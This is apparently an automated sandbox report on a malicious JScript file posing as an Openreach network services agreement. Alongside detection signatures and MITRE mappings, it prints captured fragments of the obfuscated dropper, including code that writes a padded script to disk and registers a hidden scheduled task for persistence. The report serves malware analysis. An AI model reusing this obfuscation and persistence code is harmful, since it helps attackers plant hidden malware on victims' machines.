
Windows Analysis Report
openreach network services agreement 62586.js

Overview

General Information

Sample Name:openreach network services agreement 62586.js
Analysis ID:891571
MD5:aeebc6be80dc6dd0c876ec91af97ca5f
SHA1:e896c6674313684f90255b7bc41da21f43b3adca
SHA256:e6fadd7b9aca98e13cb85930aac7631d6611874d059e98ef4139a98a92508d4c

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

JScript performs obfuscated calls to suspicious functions
Potential evasive JS / VBS script found (domain check)
Java / VBScript file with very long strings (likely obfuscated code)
Creates COM task schedule object (often to register a task for autostart)
Found WSH timer for Javascript or VBS script (likely evasive script)
Abnormal high CPU Usage

Classification

mal52.evad.winJS@1/1@0/0

Process Tree
  • System is w10x64_ra
  • wscript.exe (PID: 3132 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\openreach network services agreement 62586.js" MD5: 563EDAE37876138FDFF47F3E7A9A78FD)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: openreach network services agreement 62586.js | String found in binary or memory: http://my.opera.com/emoller/blog/2011/12/20/requestanimationframe-for-smart-er-animating
Source: openreach network services agreement 62586.js | String found in binary or memory: http://paulirish.com/2011/requestanimationframe-for-smart-animating/
Source: openreach network services agreement 62586.js | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: openreach network services agreement 62586.js | String found in binary or memory: https://gist.github.com/paulirish/1579671
Source: openreach network services agreement 62586.js | String found in binary or memory: https://github.com/darius/requestAnimationFrame/blob/master/requestAnimationFrame.js
Source: openreach network services agreement 62586.js | String found in binary or memory: https://github.com/jasonmayes/mdl-component-design-pattern
Source: openreach network services agreement 62586.js | Initial sample: Strings found which are bigger than 50
Source: C:\Windows\System32\wscript.exe | Process Stats: CPU usage > 98%
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: classification engine | Classification label: mal52.evad.winJS@1/1@0/0
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Tobacco Industry.log

Data Obfuscation

Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: WScript.Sh|.logTobacco Industry|overyProject Rec|ilableStartWhenAva|itspl|bFoldersSu|ssment.jsWorkplace Hara|mena|kDefinitionRegisterTas|UserId|lderGetFo|ountC|ettingss|leGetFi|ndatE|thPa|oundr|Nextmove|ctoryWorkingDire|sAction|oseCl|ripting.FileSystemObjectSc|tCreateObjec|ExistsFile|ShortName|ingsExpandEnvironmentStr|andomr|Hidden|askGetT|erIdLogonTrigg|tuvwxyzabcdefghijklmnopqrs|enTextFileOp|Write|tConnec|ExRun|iptwscr|ServiceSchedule.|item|DATA%%APP|umentsArg|eCreat|loorf|ggerstri|%USERDOMAIN%\\%USERNAME%";aqzHi = qSREoT.split("|");Oyzwy = aqzHi[EQQd];for (var CHwNm = 0; CHwNm <= EQQd; CHwNm++) {Oyzwy = Oyzwy.substr(1)+Oyzwy.substr(0,1);}return Oyzwy;}lvnqJY = O(4);nLGSrawL = O(3);KxamH = O(8);mKIPug = sing0gj(qyokbv+moonf+wbccwnn+gonl+veryh+friendc+darka+your5+love4+sati+eiicez+idohqjph2+card1+writee+sxtn+atom0+roome+knajo+carey+chair85+termd+captainj0c+supportx+gave0+rune+she2+period3+zhvhcz4+live9+touch9+notice4+how7+ubddpaku+jyjcwyj+hunt9+observe8+gmblzt+especiallyb+ckey+ewria+neck6+mouth3+rrbwt+followu+exobilt+redkk+umadof+motheri+point2+wihyn+evening9+subject8+linep+clothe01+angeri+glassp+rmrun+hill8+wild5650+kvdr+otljsnvxs+uqir+agree1+vshgbmr+anzdx+kxmsrjzp+mkdgtn+coast1+fact1+zdlp+vlmape+high2+himy+ten5+zjad+been435+difficulti+btlt+be3+north1+dress1);qQPBpr = WScript;thdTDxk = qQPBpr[O(24)](O(2));yhIAfT = qQPBpr[O(24)](O(23));pbMwEt = qQPBpr[O(24)](O(38));function floEy(nMMGxvN){return Math[O(18)](Math[O(28)]()*nMMGxvN);}pbMwEt[O(35)]();jQdVV = pbMwEt[O(12)]("\\");try{ytkM = jQdVV[O(30)](lvnqJY);}catch(tClts){ytkM = false;}if (ytkM == false) {cWAyl = yhIAfT[O(12)](thdTDxk[O(27)](O(40)))[O(7)];eoJFi = 589-(Math[O(43)](589/cWAyl[O(13)])*cWAyl[O(13)]);STyWg = 0;jkEEbdU = false;for(PROZWoG = new Enumerator(cWAyl); !PROZWoG[O(16)](); PROZWoG[O(19)]()) {dpJabj = PROZWoG[O(39)]();if (eoJFi==STyWg) jkEEbdU = dpJabj;STyWg++;}if (jkEEbdU != false) {PcecVtkS = 
jkEEbdU+"\\"+nLGSrawL;if(!yhIAfT[O(25)](PcecVtkS)){JqXci = yhIAfT[O(33)](PcecVtkS, 8, true);JqXci[O(34)](mKIPug);FOgg="";STyWg=0;jCMvjOs=0;FVqTmn = floEy(589)+8528;cktyHeH = O(32)[O(6)]('');GTJGxGR = Math[O(28)];DlKsVf = Math[O(18)];while(true) {FOgg += cktyHeH[DlKsVf(GTJGxGR()*25)];if (jCMvjOs==FVqTmn) {jCMvjOs=0;FVqTmn = floEy(589)+8528;JqXci[O(34)](FOgg+";");FOgg="";}STyWg++;jCMvjOs++;if (STyWg==42549807) break;}JqXci[O(22)]();JqXci = yhIAfT[O(15)](PcecVtkS);JqXci[O(9)] = KxamH;IysJNk = JqXci[O(26)];BKlPDP = pbMwEt[O(0)](0);BKlPDP[O(14)][O(5)] = true;BKlPDP[O(14)][O(29)] = false;dAbIGcD = BKlPDP[O(44)][O(42)](9);dAbIGcD["ID"] = O(31);dAbIGcD[O(11)] = thdTDxk[O(27)](O(45));gmlIb = BKlPDP[O(21)][O(42)](0);gmlIb[O(17)] = O(37);gmlIb[O(41)] = IysJNk;gmlIb[O(20)] = jkEEbdU;jQdVV[O(10)](lvnqJY, BKlPDP, 6, "" , "" , 3);ytkM = jQdVV[O(30)](lvnqJY);ytkM[O(36)](null, 2, 0, "");}}}qQPBpr[O(1)]();
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: USERDOMAIN%\\%USERNAME%";aqzHi = qSREoT.split("|");Oyzwy = aqzHi[EQQd];for (var CHwNm = 0; CHwNm <= EQQd; CHwNm++) {Oyzwy = Oyzwy.substr(1)+Oyzwy.substr(0,1);}return Oyzwy;}lvnqJY = O(4);nLGSrawL = O(
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
MITRE ATT&CK Matrix

Techniques per tactic, as laid out in the report's matrix (a number before a technique is the count shown in the report for it; entries without a number had no match):

Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts
Execution: 12 Scripting, 1 Scheduled Task/Job, At (Linux), At (Windows)
Persistence: 1 Scheduled Task/Job, 1 Office Application Startup, Logon Script (Windows), Logon Script (Mac)
Privilege Escalation: 1 Scheduled Task/Job, Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac)
Defense Evasion: 1 Masquerading, 1 Virtualization/Sandbox Evasion, 12 Scripting, 1 Obfuscated Files or Information
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS
Discovery: 1 Security Software Discovery, 1 Virtualization/Sandbox Evasion, 2 System Information Discovery, System Network Configuration Discovery
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model
Collection: Data from Local System, Data from Removable Media, Data from Network Shared Drive, Input Capture
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer
Command and Control: Data Obfuscation, Junk Data, Steganography, Protocol Impersonation
Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap
Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups, Carrier Billing Fraud
Impact: Modify System Partition, Device Lockout, Delete Device Data
Behavior Graph (ID: 891571; sample: openreach network services agreement 62586.js; start date: 20/06/2023; architecture: WINDOWS; score: 52)

  • Start -> wscript.exe (started)
  • wscript.exe -> signature: JScript performs obfuscated calls to suspicious functions
  • wscript.exe -> signature: Potential evasive JS / VBS script found (domain check)

No Antivirus matches
No contacted domains info
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | openreach network services agreement 62586.js | false | | high
https://gist.github.com/paulirish/1579671 | openreach network services agreement 62586.js | false | | high
http://my.opera.com/emoller/blog/2011/12/20/requestanimationframe-for-smart-er-animating | openreach network services agreement 62586.js | false | | high
http://paulirish.com/2011/requestanimationframe-for-smart-animating/ | openreach network services agreement 62586.js | false | | high
https://github.com/darius/requestAnimationFrame/blob/master/requestAnimationFrame.js | openreach network services agreement 62586.js | false | | high
https://github.com/jasonmayes/mdl-component-design-pattern | openreach network services agreement 62586.js | false | | high
No contacted IP info
Joe Sandbox Version:37.1.0 Beryl
Analysis ID:891571
Start date and time:2023-06-20 20:29:13 +02:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 5m 3s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultwindowsinteractivecookbook.jbs
Analysis system description:Windows 10 64 bit version 1909 (MS Office 2019, IE 11, Chrome 104, Firefox 88, Adobe Reader DC 21, Java 8 u291, 7-Zip)
Number of new started processes analysed:7
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample file name:openreach network services agreement 62586.js
Detection:MAL
Classification:mal52.evad.winJS@1/1@0/0
EGA Information:Failed
HDC Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Found application associated with file extension: .js
  • Exclude process from analysis (whitelisted): HxTsr.exe, RuntimeBroker.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
  • Excluded domains from analysis (whitelisted): www.bing.com, login.live.com
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
No simulations
No context
Process:C:\Windows\System32\wscript.exe
File Type:ASCII text, with very long lines (65536), with no line terminators
Category:modified
Size (bytes):21560371
Entropy (8bit):4.688857009150909
Encrypted:false
SSDEEP:49152:ZFHRSjneIzM63/U01V9RkThifiiLgZh6/GB8ZjPcM6Eo7GDk5ppuYbB8J4O1846h:3
MD5:FBB71376ECE43984E006BAB2F023103B
SHA1:64FAF091435407B8CF7B7C4B0047287D20192F9B
SHA-256:CD7A1BECF0DFF3DAE8B2DDF3B9C6275735C7A5EDDDDFA0E2A27E7C8BD4477E16
SHA-512:4C7F2FF98F1BA6F6CAD9A49A1FF128E88CA8694E08A03422A8139130577CB6123070E86784B6270E9B35AAC6ECAE24E64DDE9C38182C4BF5AD64552E60655E0C
Malicious:false
Reputation:low
Preview:37194372775927059843571691841857943881157354331;mix6 = 1;nov = mix6;look3='.SaSnW$ueM;\'t\\\\I\'+/^+\'x\\\\\"\'\\mu)+l\')\\\\(\'+)g+\'S\\\\w\'$S\'r\\e\'\\\\\'+R++\'P\\\\\'\'\\Mmp ';function people2(rvsvdm0m, presentv, invent9, yqcvd){xodt=foote(figure3(mshiu),oftenp);mmbkhd[43209] = thick8;}function representz(valley0, port0, oeqcxl, eoqsg, pszzev6) {had7 = "jHSGX";for (xwdukg = mix6; xwdukg < (valley0*motionm); xwdukg++) { had7 = had7 + xwdukg + had7; return xwdukg;}}function song12(){xodt[vsdsjpw](xodt[nov])(mmbkhd);mmbkhd = gymrotf;}gymrotf = mix6-nov;store9='AreMmp\'e\\cet+.}S\'p\\Y)hb\\;\'$p$+ \\I\'\'\\\\\'\'+\\s+\\+\'\' \\\\\'\"\\Tr,mC';meatl='\\/+R+/\'T\\\\\'\'\\Se+pPS\\S\'NI|to\\\'\'\\hp++es\\\'\'\\h\'Z\\as\\+\'E\\\'\'\\+L+E\\e\'\'\\\\\'cg+nT.\'\\\\\' n';function join9(cooku, ynfhl){mshiu = bcvhj+causea+childl+naogue+separate6+dollaro+thinkc+rlrate+effectt+body6+gffnxthp+serve2+khpbsae+oqfvh+temperaturec+xnitlb+zmlxkjgu+orderm+bread0+quiet0+wear9+six1+needw+fatk+now4+njlfksx;
File type:Unicode text, UTF-8 text
Entropy (8bit):5.099792197573881
TrID:
File name:openreach network services agreement 62586.js
File size:164815
MD5:aeebc6be80dc6dd0c876ec91af97ca5f
SHA1:e896c6674313684f90255b7bc41da21f43b3adca
SHA256:e6fadd7b9aca98e13cb85930aac7631d6611874d059e98ef4139a98a92508d4c
SHA512:10ebaff6bb900ee24928b88db054fa6eb59d1bdececa7d98fc15ea6b13ae197813fd9556eb4f593a3fb559451f479a449f0e783b7c30e2cdc206d311509e131e
SSDEEP:3072:olg1kjSdLLVjz6QsO7NN0w7UU5twBrrt9bom7BDafiHICXzE+H6+dlftEkqPEaPx:olg1kjSdLLVjz6QsO7NN0w7UU5twBrry
TLSH:46F3A51826E600F6455B2C6A4B2F514DB257804F86264898FCADC7DD0FA6B3417BAFFC
File Content Preview:;(function() {."use strict";../**. * @license. * Copyright 2015 Google Inc. All Rights Reserved.. *. * Licensed under the Apache License, Version 2.0 (the "License");. * you may not use this file except in compliance with the License.. * You may obtain a
Icon Hash:68d69b8bb6aa9a86
No network behavior found

[Graph: process CPU usage over time; x-axis 0-150 s, y-axis 0-100 %]

[Graph: process memory usage over time; x-axis 0-150 s, y-axis 0-3000 MB]

[Chart: process behavior distribution by category: File, Registry]

Target ID:0
Start time:20:29:40
Start date:20/06/2023
Path:C:\Windows\System32\wscript.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\openreach network services agreement 62586.js"
Imagebase:0x7ff6421a0000
File size:165888 bytes
MD5 hash:563EDAE37876138FDFF47F3E7A9A78FD
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate

No disassembly